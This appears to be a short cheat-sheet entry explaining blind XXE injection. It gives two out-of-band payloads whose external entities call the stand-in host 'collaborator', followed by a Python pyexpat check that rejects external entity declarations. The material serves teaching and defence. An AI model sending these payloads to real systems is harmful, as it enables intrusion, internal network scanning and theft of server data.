Blind XXE
What is it?
Blind XML External Entity (XXE) vulnerabilities arise when an application processes XML input that includes references to an external entity, but does not return the outcome of the entity processing in the response. This makes exploitation less direct, because the attacker receives no immediate output from the injected payload. Blind XXE can still be exploited to exfiltrate data, scan internal systems, or make requests within the network that hosts the vulnerable application.
Exploitation
Blind XXE using OOB
<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
<bar>&xxe;</bar>
</foo>
Blind XXE using OOB with XML parameter entities
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]>
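From the defender's side, both payload shapes above can be caught before the XML reaches the application parser. The following is an added example, not part of the original page: a Python gate built on the standard library's pyexpat declaration callback. The function names `external_entity_decls` and `accept` and the sample documents are assumptions constructed for illustration.

```python
import xml.parsers.expat as expat

def external_entity_decls(xml_bytes):
    """List (name, is_parameter_entity, system_id) for every external entity
    declared in the document's DTD. Nothing is fetched: pyexpat only reports
    declarations and never resolves SYSTEM identifiers on its own."""
    found = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry a literal value; external ones carry an identifier.
        if system_id is not None or public_id is not None:
            found.append((name, bool(is_param), system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_bytes, True)  # raises ExpatError on malformed input
    return found

def accept(xml_bytes):
    """Policy gate: reject malformed XML and any external entity declaration."""
    try:
        return not external_entity_decls(xml_bytes)
    except expat.ExpatError:
        return False

# Constructed samples mirroring the two payload shapes on this page.
GENERAL = b'''<?xml version="1.0" ?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator"> ]>
<foo>
<bar>&xxe;</bar>
</foo>'''
# The page shows only the DOCTYPE; a root element is appended so it parses.
PARAMETER = b'<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://collaborator"> %xxe; ]><foo/>'
BENIGN = b'<foo><bar>1</bar></foo>'

if __name__ == "__main__":
    for label, doc in (("general", GENERAL), ("parameter", PARAMETER), ("benign", BENIGN)):
        print(label, accept(doc), external_entity_decls(doc))
```

Where the application never needs a DTD, rejecting any document that contains a DOCTYPE is the stricter policy and covers both cases.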